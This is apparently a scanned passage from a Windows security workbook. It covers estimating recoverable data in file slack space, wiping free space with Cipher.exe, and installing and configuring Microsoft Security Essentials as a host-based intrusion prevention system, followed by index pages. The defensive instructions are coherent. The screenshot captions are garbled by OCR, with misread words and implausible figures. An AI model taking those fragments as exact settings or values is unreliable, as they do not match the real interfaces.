K 3% Floppy (A1) File: Folder 9/27/2006 5:23 PM
(= “ee Local Disk (i) Explore F!\e Folder /702004 1:24 PM
= 84 open File: Folder 10/3/2006 11:08 AM
I3 Documents and Settings cearch... File: Folder /1712004 4:16 PM
I3 Program Files | M5-DOS5Batch File 31712004 12:43 PM
|0 RECYCLER Send To ¥ | Corfiguration Settings  3/17j2004 1:24 PM
10 System Yolumne Informati Cuti System file 3[17/2004 12:43 PM
10 WINDOWS Copy System filz 31712004 12:43 PM
15 WuTemp o | oystemfile 31712004 12:43 PM
[T WHPYOL_EN (D2} Create Shorteut M3-DOS Application 31712004 3:20 PM
[} Control Panel Delete System file 3/17j2004 3:20 PM
(3 shared Documents Rename System filz 10/3/2006 11:15 AM
(3 Administrator's Documents Properties
(3 intense's Documents
(3 LULU's Documents
‘g My Network Places
#) Recyde Bin
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% This process may take a few minutes to complete.
TE

13. Once the properties page opens, view the number of files on the C:\ drive at the top of
the dialog box.

System Volume Information, ... Properties |EHX|

Gereral | Custamize |

.“ 10,510 Files, 830 Folders

Type: Multiple Types

Location: Allin Ciy

Size: 1.47 GB {1,584,956,322 bytes)

Size ondisk: 1,42 GB (1,530,278,949 bytes)

Attributes  [B] Read-only

Hidden

bose

% In the graphic, there are 10,510 files on the C:\ drive.
TE

14. Slack space exists in only the very last cluster of each file. Statistically speaking, the
amount of data in slack space is the number of files on a partition times 50 percent
of the cluster size. The last cluster will be almost empty for some files and will be
almost full for other files. On average, the slack space will be 50 percent of the cluster
size. Calculate the slack space on the C:\ drive. From the data in the graphics, the
calculation is as follows:

4 KB (the cluster size) X 50% (statistical slack space/file) = 2 KB (slack space/file) X
10,510 (files on C:\) = 21 MB of potentially recoverable data that exists in slack space
on the C:\ drive

Many partitions grow to have several hundred thousand files. Each 100,000
TE files will typically yield 200 MB of recoverable data from slack space on a

Windows system (since the default cluster size for NTFS is 4 KB).
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The data in the slack space will remain unprotected and available for
JTE recovery when using Cipher.exe. To protect the data in the slack space,
third-party tools will be required.

15. Close the System Volume Information Properties dialog box.

Protecting Deleted Data from Recovery Using Cipher.exe
1. In the command window, at the command prompt, type cipher /? and press the Enter key.
2. Review the help information for Cipher.exe.

3. At the command prompt, type cipher /W:c:\ and press the Enter key.

IC:n>cipher AUzczN I—
To remove as much data as possible, please close all other applications while
running CIPHER ~U.

riting BxBA

This process could take several minutes to possibly longer than 1 hour. Cipher

ITE first writes all zeroes in all free clusters on the partition.Then it writes all ones
in all free clusters on the partition, and then it writes a random pattern of ones
and zeroes in all free clusters on the partition. This provides three overwrites
of data in the free clusters. It is generally recommended that you not use the
system for other purposes while Cipher is performing these tasks.

4. After Cipher completes its series of overwrites, close the command window.

Criteria for Completion

You have completed this task when you have calculated both the amount of free space to be
protected with Cipher.exe and the amount of data in slack space, which could be compromised.
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Task 10.5: Implementing a Host-Based
Intrusion Detection System

A common security practice is to implement monitoring devices or applications on the network
and on critical systems to identify, alert, and sometimes block undesirable traffic, activities, and
attempted access. Intrusion detection systems (IDSs) monitor, analyze, and log traffic watching
for attacks. If an attack is detected, the IDS will alert administrators of the perceived attack,
requiring human reaction and intervention.

Intrusion prevention systems (IPSs) are an extension of the IDS. Like IDSs, IPSs monitor,
analyze, and log traffic watching for attacks. If an attack is detected, the IDS will alert
administrators of the perceived attack and will take automatic and programmed action in
an attempt to block the traffic and/or deny the unauthorized access. The objective of the
IPS is to protect the information-systems environment without requiring human reaction
and intervention.

)’ Always configure the IPS to react to systems you manage and maintain.
‘dTE Counterattacking the attacker is generally discouraged. A counterattack,
while tempting, is generally considered unethical and unprofessional
and could result in your company being held liable for damages to the
attacker—for attacking them!The perceived attack by the IPS might have
been a misconfiguration, a malfunctioning device, or a simple accident by
an innocent user.

The automatic protective actions that an IPS can perform include the following:

s Adding a new “block rule” on a firewall to disallow traffic from an attacking source
IP address

= Sending the internal and friendly victim TCP Reset frames that spoof the attacker to
keep them from establishing a session with the attacker

= Sending 802.11 deauthentication frames to wireless clients (“friendlies”) to keep them
disconnected from a rogue access point

The terms IDS and IPS are often used interchangeably, but there are significant
differences in the level of protection these two different systems can provide. For the
remainder of this task, we will refer to these two types of systems collectively as IDSs.

These devices remain active 24/7 and diligently monitor and inspect all traffic. These
devices typically utilize two types of analysis engines:

Knowledge-Based The purpose is to detect known attacks. This engine compares
actual traffic to a collection of known and therefore recognizable attack signatures
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or undesirable protocols to identify attacks. This engine requires frequent definition
updates to keep current with new attack signatures.

Behavior-Based The purpose is to detect new, unknown attacks. This engine maintains
a statistical overview of the normal operations, demands, resource consumption, and

so forth of the monitored system by monitoring actual use. If these statistical values for
use deviate significantly from the established “normal” levels, the behavior-based engine
reacts to the anomaly. The items that are watched and the level of deviation from the
learned, normal use that causes a triggered event are typically configurable. This engine
may also detect malicious actions performed by applications, such as deleting files or
attempting to reconfigure system settings.

IDSs can be configured to monitor the network, called a network-based IDS, or NIDS.
IDSs can be configured to monitor a single, critical system, called a host-based IDS, or
HIDS. In this exercise, you will install a host-based antivirus and IDS tool on your local
computer to monitor for potential malicious activities on the system.

Microsoft has provided several free and relatively easy-to-use HIDS tools for consumers.
Microsoft’s Windows Defender program monitors for spyware and malicious activities
on a system. This program was followed by the Windows Live OneCare program, which
has evolved into a host-protection system that includes antivirus features in Microsoft’s
Security Essentials.

See Windows Defender at

www .microsoft.com/windows/products/winfamily/defender/software.mspx

www.microsoft.com/en-us/security_essentials/default.aspx

For more than 10 systems, Microsoft provides commercial-grade protection (for a fee) in
their Microsoft Forefront Endpoint Protection product. See Microsoft Forefront Endpoint
Protection at

http://technet.microsoft.com/en-us/evalcenter/ff182914.aspx

Scenario

You are preparing a report on computer security for management. To complete the required
research, you must visit some potentially hazardous websites on the Internet and you

are concerned about protecting the system from malware that may be injected onto your
system. Whenever this occurs, you want the computer to quarantine any processes that
may be malicious.

Scope of Task

Duration
This task should take 25 minutes.



Task 10.5: Implementing a Host-Based Intrusion Detection System 541

Setup

You will download and install a free antivirus/HIDS application.

In the exercise, the Windows 7 operating system has User Account Control (UAC) disabled.
If your system does not have UAC disabled, you will be prompted for administrator approval
during numerous steps.

Caveat

The antivirus, IDS, and IPS application used in this exercise does not provide 100 percent
of the security required to protect networks or systems. It is an important part of the
security structure, but must be layered within many additional security systems and
procedures, including policies, user training, operating system and application patching,
strong authentication, strict permissions, auditing, encryption, and firewalls.

The application you will install in this exercise cannot be installed on a system that
already has an antivirus program running. You must uninstall any existing antivirus
applications before beginning the exercise.

Procedure

You will download and install a security application that includes antivirus and a host-
based IDS, Microsoft’s free and relatively new Microsoft Security Essentials (MSE). MSE
quarantines or deletes applications that are detected containing known malware or that
demonstrate potentially malicious behavior. Since MSE triggers a protective response
when malware or malicious behavior is detected, MSE falls into the category of host-based
intrusion prevention systems (HIPSs).

Equipment Used

For this task, you must have:

= Windows 7 system (with no antivirus software installed)
= Administrator access

= Internet access

Details

Download and Install the Security Application

1. Log on to the Windows 7 system as the Administrator.
2. Launch Internet Explorer.

3. In the address field, type the URL http://www.microsoft.com/security_essentials/ and
press Enter.

4. Review the details of Microsoft Security Essentials. Click on the Download Now link
to download the application.
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5. Save the application to your desktop.
6. Launch the downloaded setup application.
7. Click Next at the Welcome screen.

-

N
L=—"
Recycle Bin
g b
. @B Microsoft Security Essentials =4
Welcome to the Microsoft Security Essentials Installation
Wizard
PGP Shredder
M]crosoﬂ Security Essentials helps enhance the security and perfarmance of your
) computer.
— Security ) o )
=" i Security Essentials is continuously updated with new features and services that
ﬂ' Essent|a|5 may require sending additional information to Microsoft. To learn mare, read
- the Privacy Statement. The latest updates will download after the installation
mseinstall —
completes,

Chick Mext to continue,

Ry [N - Mest = ][ Cancel

el = Olé] el AT RRON s |

8. Feel free to review the terms of licensing. Click I Accept on the Software License
Terms page.

9. On the Customer Experience Improvement Program page, select the “I do not want
to join the program at this time” option and click Next.

10. On the Optimize Security screen, enable the Turn Firewall On check box (enabled by
default) and click Next.

11. Review the warning regarding the dangers of running multiple antivirus programs on
a single system, and click Install.

12. Save any open files and close any open applications. On the Completing the Microsoft
Security Essentials Installation Wizard screen, click Restart Now to reboot the
computer.
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Recycle Bin

.
@B Microsoft Security Essentials =il

Completing the Microsoft Security Essentials Installation

Wizard
PGP Shredder
Microsoft Completing the Security Essentials Installation Wizard.
= Security ) o
i} ] To complete the installation and make sure that Security Essentials is helping to
‘9‘ Essentials pratect yaur computer, restart your campuiter.

mseinstall Ta complete this wizard, click Restart now.

3

F IR Restartnow | | Close |

Q]& "‘ 0@ S aiPme |

Using the Security Application
1. After the reboot has completed, log on as the Administrator.

2. Notice that Microsoft Security Essentials automatically launches and downloads the latest
malware updates, and then proceeds with performing a Quick scan of the system.

@B Microsoft Security Essentials =] = ]

Computer status - Protected

@8 Update © Help ~

Security Essentials is scanning pour computer...

This may take some time, depending an the scan type selected...

- | Cancel scan

Scan type: Quick scan

Start time: 12:56 PM
Time elapsed:  90:00:58

Trems scanned: 173

Ttem: CAWindows' System32imssweh.dll

B2 |

.J,
(v :.
E:‘

@ e

"))
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Review the scan summary when the Quick scan completes. Notice that you can
perform a Quick scan, which scans the commonly infected file types and locations; a
Full scan, which scans all files on the system; or a Custom scan, which allows you to
target areas of concern, such as a directory where you store downloaded files.

r .
@B Microsoft Security Essentials e

Computer status - Protected
@ Help v

Scan completed on 77715 items. Scan aptions:

Mo threats were detected an your computer during this scan, .
@ Quick

Security Essentials is monitaring your computer and helping to protect
it © Full

) Custam...

& Real-time protection: on
& Virus and spyware definitians:  Up to date

Scan details
Scheduled scan: Sunday around 2:00 AM (Quick scan) | Change my scan schedule
Last scan: Today at 109 PM (Quick scan)

112PM |

RGN

Click the Update tab. Observe the Definitions Created On and Definitions Last Checked
dates. Also notice that you can manually trigger a definitions update by clicking the
Update button.

r .
@B Microsoft Security Essentials e

Computer status - Protected

@ Help v

Virus and spyware definitions status - Up to date

Security Essentials updates your virus and spyware definitions automatically to help pratect yaur computer.

Definitions created on: 2/28/2011 at 5:59 AM
Definitions last checked:  2/26/2011 at 12:56 PM Update
Virus definition version: 1.99.265.0

Spyware definition versian:  1.99.265.0

© Did you know?
Virus and spyware definitions are files that Security Essentials uses ta identify malicious or patentially unwanted software on
yaur computer,
These definitions are updated automatically. You can also click Update to update definitions on demand.

| Speakers: 100%

. ; 100PM |
9 e ™
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5. Click the History tab. Observe the three filters to view selected, quarantined, or deleted
malware that has been detected on the system. Also notice that you can purge the
history by clicking the Delete History button.

r 1
@B Microsoft Security Essentials =S

Computer status - Protected

@% update @ Help ~

View the following items that Security Essentials detected as potentially harmful:
© All detected items - View all the items that were detected an your computer
) Quarantined items only - These items that were disabled and prevented from running but not removed.

(@ Allawed items only - These are items that yau allawed ta run on yaur camputer,

Detected item Alert level Date. Action taken

| & Detete nistory

N

130eM |
2 |

AR )
6. Click the Settings tab. Notice the left pane where eight different sets of settings can be

selected. The initial focus is on the Scheduled Scan settings. Review the options available for
the scheduled scans, including the scan type, when to perform the scan, whether you want
to update definitions before the scan and whether to start the scan only if the system is not in
use, and a limit of CPU usage for the scan to allow other processes reasonable functionality
during the scan. Choose a scan time when the system will be powered on but not in a critical
function or use time, since the scanning process will degrade the system’s performance.

r 1
@B Microsoft Security Essentials =S

Computer status - Protected

@% update @ Help ~

Default actions Run a scheduled scan on my computer (recommended)
et s
Excluded files and locations <o type:

P

When: Sunday
Excluded processes

Advanced Araund: 2:00 AM M

Microsoft SpyMet
[¥] Check for the latest virus and spyware definitions before running a scheduled scan

[¥] Start the scheduled scan only when my computer is an but not in use

[¥] Limit CPU usage during scan to: | 50% v

& save changes | [ Cancel

136PM |

e PR
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Optional activity: Feel free to schedule the automatic scan for the
TE immediate future to observe its firing.

7. In the left pane, click Default Actions. Notice the four levels of alerts, indicating
the severity of the perceived threat to the system: Severe, High, Medium, and Low.
Review the actions and alert levels by clicking on the “What are actions and alert
levels?” link.

r B
@B Microsoft Security Essentials E@g

Computer status - Protected

@3 Update @ History @ Help

Scheduled scan . . . .
Chaase the action ta display or apply by default when Security Essentials detects potential

Default actions threats with the following alert levels,

Real-time protection What are actions and alert levels?

Excluded files and locations Severe alert level:

Excluded file types =
[ Recommended action
Excluded processes

Advanced High alert level:

Micrasoft Spyllet IRecommended action

Mecliurm alert level:

I Recommended action

Low alert level:

[ Recommended action

Apply recommended actions: Help protect your computer by applying the actions
abave after Security Essentials detects potential threats.

To convert the HIPS into an HIDS by disabling the automatic, protective
TE functions, you could clear the Apply Recommended Actions check box.
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In the left pane, click Real-Time Protection. Learn more about real-time monitoring by
clicking the Tell Me More link. Review the options on the Settings tab, which include
scanning all downloads, monitoring file and program activity, monitoring behavioral
patterns, and monitoring for network-based exploit attempts.

r B
@A Microsoft Security Essentials E@u

Computer status - Protected

&% update

Scheduled scan

Default actions [¥] Turn on real-time protection {recommended)

= = Real-time pratection alerts you when viruses, spyware, ar other potentially unwanted
software attemnpts to install itself or run on yaur computer. Tell me mare
Excluded files and locations
Excluded file types Select real-time pratection aptians:

Excluded processes Scan all downloads
Advanced Scan files and attachments that vou download from the Internet.

Micrasoft Spyhlet
Manitar file and program activity on your camputer

[Monilol all files b

Enable hehaviar manitaring
Check for certain patterns of suspicious activity,

Enable Metwark Inspection System
Increase your protection against netwark-based explaits.

[ @Save changes ] [ Cancel

In the left pane, click Excluded Files And Locations. To keep MSE from scanning
specified, known good files and locations, add those files and locations to this
dialog box. It is not uncommon for a security professional to keep and use (for
white-hat purposes) a collection of known hacker tools that would be quarantined
or deleted by MSE. This feature allows you to keep these otherwise-malicious
tools intact.
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- -
&8 Microsoft Security Essentials = [E

Computer status - Protected

&¥ Update

Scheduled scan " . .

Exclucling certain files and locations can help speed up a scan, but may leave your computer
Default actians less pratected, Ta add multiple files or locations, use a semicalon to separate the entries in the
Real-time protection test box.

Excluded files and locations|

Excluded file types File locations:

Excluded processes i Brows

Advanced —
Micrasaft Spyhlet - [ A

| Remove

[ @seve changes || cancel

10. In the left pane, click Excluded File Types. Use this dialog box as well to keep MSE
from scanning specified, known good file types.

.
& Microsoft Security Essentials ==

Computer status - Protected

@8 update

Scheduled
cheduled scan Excluding certain file types can help speed up a scan, but may leave your computer less

Default actions pratected. Ta add multiple file extensions, use a semicalan to separate the entries in the text

Real-time protection box

Excluded files and locations

Excluded file types File extensions:

Excluded processes <

Advanced i
Microsoft Spyllet

File type Estension [ Remove

[ @Save changes ” Cancel
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11. In the left pane, click Excluded Processes. A process is a subset of an application. Use
this dialog box to keep MSE from scanning specified, known good applications that
may contain inaccurately detected malicious processes.

-
@& Microsoft Security Essentials =

Computer status - Protected

@ Help »

Scheduled scan
Excluding certain processes that run on yaur computer can help speed up a scan, but may leave

Default actions vour camputer less pratected.Ta add multiple processes, use a semicalan to separate the
Real-time pratection entries in the text box.

Excluded files and locations Add anly files that have one of the following extensions: exe, .com or scr.

Excluded file types

Excluded pracesses

Pracess names:

Advanced Brows:

Mi ft Spyhlet
icrosoft Spyl Add

Remove

[ B savechanges || Cancel

12. In the left pane, click Advanced. Review the optional settings available.

-
@B Microsoft Security Essentials e

Computer status - Protected

@ Help v

Scheduled scan
Default actions

Real-time pratection
Excluded files and locations Sean removable drives

Excluded file types Scan for malicious saftware and unwanted software in the contents of removable drives
Excluded pracesses such as USBflash drives, when running a full scan.

[7] Scan archive files
Scan for malicious saftware and unwanted software in archive files such as zip or .cab files.

Microsoft Spyblet [T Create a system restore point
Create a system restare point on yaur computer hefore applying actions to detected items,

[] Allow all users to view the full History results
Allow nenadministrators on this computer ta view all the detected items in the History tab.
By default, some items are hidden to pratect user privacy.

[T] Remove quarantined files after: | Lmonth 2
Quarantined files remain disabled until vau allow them or remave them.

[ B savechanges || Cancel
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13. In the left pane, click Microsoft SpyNet. Here, you can select to not join Microsoft
SpyNet or to join with a Basic or Advanced membership. The Basic membership
assures anonymity of the user, but sends some technical details of system use back to
Microsoft SpyNet. The Advanced membership potentially identifies the user and some
of their computer and Internet use details. Feel free to review the Microsoft SpyNet
privacy statement by clicking on the link at the bottom of the scrolling window.

- 5
@& Microsoft Security Essentials =

Computer status - Protected

@8 Update © Help ~

Scheduled scan collected and sent.

Default actions (@) Tda not want to join SpyPet

Real-time pratectian Mo infarmation will be sent ta Micrasoft. You wan't be alerted if unclassified software

Excluded files and locations is detected running on your computer.

Excluded file types © Basic membership

Excluded pracesses Send hasic infarmation ta Micrasaft about software that Security Essentials detects

Advanced including where the saftware came from, the actions that you apply or that Security

Essentials applies automatically, and whether the actians were successful. In same.
instances, persanal infarmation might unintentionally be sent to Microseft, However,

Microsoft will not use this infarmation ta identify you ar ta cantact you.

@) Advanced membership

In addition to basic informatian, Security Essentials sends mare information ta
Microsoft abaut malicious saftware, spyware, and potentially unwanted saftware,
including the location of the software, file names, how the saftware operates, and
haw it has impacted your camputer. In same instances, persanal infarmation might
unintentionally be sent to Microseft; however, Microsoft will not use this infarmation
to identify you or contact yau.

[ B savechanges || Cancel

242PM |

RGN

Criteria for Completion

You have completed this task when you have installed and configured the host-based
intrusion prevention system, Microsoft Security Essentials.
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addresses (continued)
MAC
finding, 331
with switches, 477
in wireless security, 329-331
AdminEFSDRA .cer file, 163
AdminEFSDRA .pfx file, 163
Administration Tools Setup Wizard, 530
administrative activities by
nonadministrator users, 316-318,
316-317
Administrator accounts
decoy, 275-277, 275-276
disabling, 274
DSRM passwords, 277-279
renaming, 273, 275, 276
for services, 31-32, 31
for VPN server dial-in privileges,
298-299
Administrator Properties dialog
box, 277
Adminpak.msi file, 236, 530, 532
ADUC. See Active Directory Users And
Computers (ADUC)
Advanced dialog box, 333, 334
Advanced Attributes dialog box
encrypting data, 165, 165, 170
recovering data, 174
Advanced Backup Options dialog box,
199, 199
Advanced Encryption Standard (AES)
BitLocker, 220
IPSec. See IPSec (Internet Protocol
Security) VPNs
Advanced Key Settings dialog box,
242,242
Advanced Privacy Settings dialog box,
373,373
Advanced Security Settings For dialog
box, 456, 456,458

Advanced Sharing dialog box, 337-338,
338
Advanced tab
digital certificates, 395, 395
minidumps, 470, 470
spam, 386, 386
Windows Firewall, 44, 44
adware, 125-129, 127-128
AES (Advanced Encryption Standard)
BitLocker, 220
IPSec. See IPSec (Internet Protocol
Security) VPNs
AGDLP chain, 210
content for, 213-219, 213-219
for Deny group, 280-285, 281-284
users and groups for, 210-213,
211-213
ALE (Annual Loss Expectancy)
calculating, 6-7
formula, 3
allocation units, 536
Allow A Program Or Feature Through
The Windows Firewall option,
354-355, 360
Allow Access option, 299
Allow Another Program option, 356
Allow BitLocker Without a Compatible
TPM option, 226
Allow Change permission, 219
Allow Inheritable Permissions option,
216
Allow Service To Interact With Desktop
option, 32
Allow Users To Connect Remotely To This
Computer option, 306
Allow Write Permission option, 216
Allowed Programs And Features list,
355-356, 355, 360
Always Start In Wizard Mode option, 196
Analyze Computer Now option, 69
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Annual Loss Expectancy (ALE)
calculating, 6-7
formula, 3
Annual Rate of Occurrence (ARO)
calculating, 5-6
formula, 3
antivirus software, 112-113
downloading and installing, 114, 114-115
scanning with, 116-118, 116-118
testing, 118
updating, 115-116, 115
ARP (Address Resolution Protocol)
poisoning, 141-150, 143-149
assessments, security
IT Shavlik for, 428-430, 429-430
Microsoft Baseline Security Analyzer
for, 424-428, 426-427
risk, 2-3
Threat Analysis Index, 129
asset classification and control, 11
Assign Letter Drive Or Path screen, 192
Association tab, 332, 333
attributes, auditing, 457-458
Audio tab, 405
Audit Account Logon Events option,
264,266
Audit Logon Events option, 264
audit logs
monitoring, 264
reviewing, 459-468, 461-468
Audit Object Access option, 451
Audit Policy
for object access, 449-458, 451-458
for security templates, 69, 73
setting, 265-266, 266
triggering, 463-464, 463
Audit Process Tracking option, 70
Audit tab, 422, 422
auditing
attributes for, 457-458

logons, 264-271, 266-270
in Retina, 422, 422
Auditing Entry For dialog box,
457-458
Auditing tab, 456, 456
Authenticated Users from the resulting
Name (FQDN) list, 456
authentication
Firesheep attacks, 150-153, 152-153
IPSec VPN, 340
RDP, 309-310
VPN, 288-289, 294
Auto Download And Schedule The Install
option, 64
Autoexec.bat file, 81, 81
Autoexec.nt file, 81-82
automated operating system patching
in Domain mode, 55-65, 56-64
in Workgroup mode, 54-55, 55
Automatic Picture Download Settings
dialog box, 381, 381
Automatic (Recommended) option, 55
Automatic service startup type, 29-30
Automatic Updates tab, 54-55
Automatically Connect To Non-preferred
Networks option, 333
Automatically Restart option, 471
autorun.ini script, 83
Autorun security, 74-75
Autoexec.nt and Config.nt for,
81-82, 81
CD-ROM function disabling, 85-86,
85-86
Registry for, 78-80, 78-80
scripts for, 82-83, 82
Startup folder for, 80-81, 80-81
System Configuration Utility for,
75-79, 76-78
Autoruns tool, 74
availability, 518
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avast! antivirus tool
downloading and installing, 114,
114-115
scanning with, 116-118, 116-118
testing, 118
updating, 115-116, 115

background, desktop, 524
Backup dialog box, 199
Backup Job Information dialog box,
198-200, 198
Backup Or Restore Wizard, 196
Backup Progress dialog box, 199, 199
Backup tab, 197, 197
Backup Utility, 196-197, 196-197
Backup Utility Advanced Mode screen,
196-197
backups, 194-195
catalog for, 195-197, 196-197
digital certificates, 391-396, 393-396
for file system conversions, 179
initializing, 197-200, 198-200
for memory dumps, 469
for Registry edits, 472
restoring, 203-208, 204-208
scheduled, 200-203, 200-202
banners, grabbing, 440-441
behavior-based IDS analytic engines, 540
binary rootkits, 119
BitLocker drive encryption, 156, 219-222
implementing, 231-232, 231-232
partitions, 222-225,222-224
USB keys and recovery password keys,
227-230, 227-230
USB thumb drives, 225-227, 225-227
block rules in intrusion protection
systems, 539
Blocked Encodings List, 383

Blocked Senders List, 383
Blocked Top-Level Domain List,
383-385, 385
blocking cookies, 371-373, 373
blue screen information, 473, 473
Bogus OU Properties dialog box, 93
BOOT.INI tab, 77, 77
booting
“Known Good” configurations,
525-526
Safe Mode, 519-523, 520-522
bouncing services, 313, 315
Brazil, spam from, 385
Browse For Folder dialog box, 249
browser headers, 433-434
browsing security, 409-411, 410-411
buffer size in packet capturing, 483
bugs, patches for. See operating system
patching
business continuity planning, 10

C

Cain & Abel, 141-150, 143149
Capture dialog box, 484
Capture Interfaces dialog box, 482
Capture Options dialog box, 483, 483
captured data, viewing, 339-342,
339-342
capturing packets, Wireshark packet
analyzer for, 476-479
downloading, 479, 479
installing, 479-481, 480-482
network analysis with, 484-486,
485-486
packet capturing with, 482-484,
482-484
catalogs for backups, 195-197, 196-197
CBC (Cipher Block Chaining), 220
CCDU tab, 142
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CD-ROM AutoRun function disabling,
85-86, 85-86
Certificate dialog box, 389-390, 389
Certificate Export Wizard, 393, 393
Certificate Import Wizard, 164, 394, 394
certificates
backups, 391-396, 393-396
installing, 387-390, 388-389
Certificates dialog box, 392
Change Adapter Settings option, 375
Change Advanced Settings option, 332
Change Approval option, 61
Change Automatic Download Settings
option, 381
Change Scope dialog box, 43, 43
Change Security Settings dialog box,
388-390, 388
Check For Problems option, 132
Check For Publisher’s Certificate
Revocation option, 395
Check For Server Certificate Revocation
option, 395
CheckDisk scans, 535-536
China, spam from, 385
chkdsk utility, 535
Choose A Wireless Network dialog
box, 332
Choose Components screen, 480, 480
Choose Installation Location screen, 480
Cipher Block Chaining (CBC), 220
Cipher.exe, 534-535, 538, 538
classification of information, 20-22
Client Respond IPSec Policy GPO, 293
Client (Respond Only) option, 293
clients
ICS, 377,377
RDP, 307-311, 308-311
SFTP, 399-400, 399-400
VPN, 300-304, 301-304
wireless security, 331-335, 332-334

Clients DLG Properties dialog box,
215, 215
Clients GG Properties dialog box, 214
ClipBook service, 30-32, 31-32
clusters, 536
Cohen, Fred, 112
command-line Run As, 318
commercial classification of information, 21
Common Vulnerabilities and Exposures
(CVE) list, 419
Comodo certificates, 388
company overviews, 9-10
comparing hashes, 402, 402
Compatws security template, 68
Complete Memory Dump option, 471
Completing The New Connection Wizard
screen, 302
compliance, policy development for, 10
computer and network management,
policy development for, 11
Computer Management console
disk initialization, 190, 190
FAT partitions, 180, 185, 185
non-administrator users, 314-315
Safe mode, 521
service management, 27-28, 27
user accounts, 172, 172
volumes, 194, 194
Computer setting for RDP, 311
computers, locking, 102-109, 104-108
confidential classification, 20
Confidential Clients Properties dialog
box, 293
Confidential Servers Properties dialog
box, 292, 453
confidentiality, 518
Contfig.nt file, 81-82
Config.sys file, 81
Configure And Enable Routing And
Remote Access option, 295
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Configure Automatic Updates option, 64
Configure Computer Now option, 69
Configure Device dialog box,
297-298, 298
Confirm Restore dialog box,
206-207, 206
Confirm Setting Change warning
option, 453
confirming
NTES partitions, 187-188, 187
System Restore, 528-529
Connect To The Network At My
Workplace option, 301
Connect Using A Broadband Connection
option, 366
Connect VPN dialog box, 302-303, 303
Connect When This Network Is In Range
option, 333
Connection Availability screen, 301, 302
Connection Name screen, 301
Connection Security Rules option,
343, 343
connections
RDP, 311-312
VPN, 301-304, 301-304
wireless networks, 333-334, 333
Connections tab, 333, 333, 366
connectivity, IPSec VPN, 339-342,
339-342
Console Root window, 28
Content tab, 392, 392
Control Panel
personal firewalls, 354, 354
screen savers, 107-109, 107
Control Panel Setup: Enable Advanced
Startup Options dialog box, 226, 226
conversions
to dynamic disks, 189-191, 190-191
FAT to NTFS, 178-188, 180-187
Convert utility, 179, 186-187, 186

cookies
settings, 371-373, 373
stealing, 150-153, 152-153
CoolWebSearch spyware, 129
Copy Items dialog box, 500, 500
counterattacks, 539
Cracker tab, 142
CrashOnCtrlScroll entry, 472, 472
Create a Restore Point screen, 528, 529
Create This Connection For setting, 301
Custom Configuration screen, 296, 296
custom security templates, 68-72, 68-72
Customer Experience Improvement
Program page, 542
Customize Data Protection Settings dialog
box, 348349, 348, 350
Customize IPSec Settings dialog box,
347,348
CVE (Common Vulnerabilities and
Exposures) list, 419

D

DACL (Discretionary Access Control
List), 462
daily backups, 200-203, 200-202
Data Encryption Standard (DES),
289, 294
Data Recovery Agent (DRA), 157
creating, 161-164, 161-164
for recovering data, 170-175, 172-174
Database tab, 405
databases
LAD, 271
Link Logger, 405
SAM, 175
DCPromo, 271
deauthentication frames, 539
Decoders tab, 142
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decoy domain administrators, 275-277,
275-276
Default Domain Controllers Policy
Audit Policy in, 265-266, 266
Security Event Log in, 267-268,
267-268
security logging in, 268-269, 268-269
Default Domain Policy
Account Lockout Policy in, 262-263,
262-263
for default users, 273-275, 273-274
password policies in, 261-262,
261-262
Default Security Setting For This
Cryptographic Message Format
option, 388
default security templates, 66-68, 67
default users, 271-272
decoy domain administrator account,
275-277,275-276
Default Domain Policy for, 273-275,
273-274
DSRM administrator passwords,
277-279
Define These Policy Settings option,
451-453
Define These Policy Settings to Success
and Failure option, 266
Define This Policy Setting field, 273-274
Define This Policy Setting option, 35
definitions for Microsoft Security
Essentials, 544, 544
deleted content
recovering. See recovering
sanitizing, 534-539, 536-538
deleting user accounts, 172
denial of service (DoS) attacks, 5
Deny All AGDLP, 280-285, 281-285
Deny All GG Properties dialog box,
282-283, 282
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Deny All permission, 284
Deny Full Control permission, 284
Deny groups, 279-284, 281-285
dependencies between services, 26,
28-29, 28
Dependencies tab, 28-29
deploying IPSec, 289-293, 292
DES (Data Encryption Standard),
289,294
Description field for Security log, 466
desktop, 524
Desktop Application Scan option, 427
Desktop Properties dialog box, 524, 525
destination computer for shares, 337-339,
337-339
Destination option for packet filters, 322
Device Manager, 316-318
dial-in for VPN servers, 298-299,
298-299
Dial-in tab, 299, 299
digital certificates
backups, 391-396, 393-396
installing, 388-390, 388-389
Digital Subscriber Line (DSL), 375
Directory Services Restore Mode
(DSRM), 271
Disable USB Settings option, 93
Disabled service startup type, 29
disabling
Administrator account, 274
CD-ROM AutoRun function, 85-86,
85-86
daily backups, 202, 202
external storage devices, 86-93, 88-93
services, 29-30, 29
discarding media, 534-539, 536-538
Discovery tab, 421, 422
Discretionary Access Control List
(DACL), 462
Disk Drives option for RDP, 308
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Disk Management
FAT partitions, 180
volumes, 194, 194
diskpart command, 223-224, 223-224
disks
FAT to NTES conversions, 178-188,
180-187
initializing, 189-191, 190-191
Display Adapter Properties dialog box,
316-318
Display tab, 307, 308
displaying file extensions, 379-380,
379-380
DLG (Domain Local Group)
global security groups in, 256
permissions, 279
DNS (Domain Name System), 39, 377
Do Not Overwrite Events option,
268, 453
Do Not Store Updates Locally; Clients
Install From Microsoft option, 59
documents, value of, 19-22
domain administrator accounts, 275-277,
275-276
Domain Controllers Properties dialog
box, 269
Domain Local Group (DLG)
global security groups in, 256
permissions, 279
Domain mode, automated operating
system patching in, 55-65, 56-64
Domain Name System (DNS), 39, 377
Domain setting
IPSec VPN firewalls, 345
RDP, 311
Donations option, 131
Don’t Download Pictures option, 381

Don’t Search. I Will Choose The Driver To

Install option, 522
DoS (denial of service) attacks, 5

Download Updates For Me, But Let Me
Choose When To Install Them
option, 5§

downloads

avast!, 114, 114-115
email, 381, 381
validating, 400-403, 402
Wireshark, 479, 479
DRA (Data Recovery Agent), 157
creating, 161-164, 161-164
for recovering data, 170-175, 172-174

Drive Properties dialog box, 491-492

Driver tab, 316-318, 317

drivers, 316318, 317, 520

Drop All Packets Except Those That Meet
The Criteria Below option, 322

DShield tool, 406, 435-437, 435-437

DSL (Digital Subscriber Line), 375

DSRM (Directory Services Restore
Mode), 271

DSRM administrator passwords, 277-279

dumps, memory, 468—469

minidump configuration, 469-471,
470-471

Registry for, 472, 472

reviewing, 473-476, 473-475

triggering, 473, 473

dynamic disks, conversion to, 189-191,
190-191

Edit A Service dialog box, 43

Edit DWORD Value dialog box, 472, 472

education in user awareness programs,
12-16

EF (exposure factor), 4

EFS. See Encrypting File System (EFS)

EICER (European Institute of Computer
Antivirus Research), 118
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802.11 wireless security, 323-325
access points, 326-330, 326-330
clients, 331-335, 332-334
Elephant Diffuser function, 221
email, 378-379
digital certificates
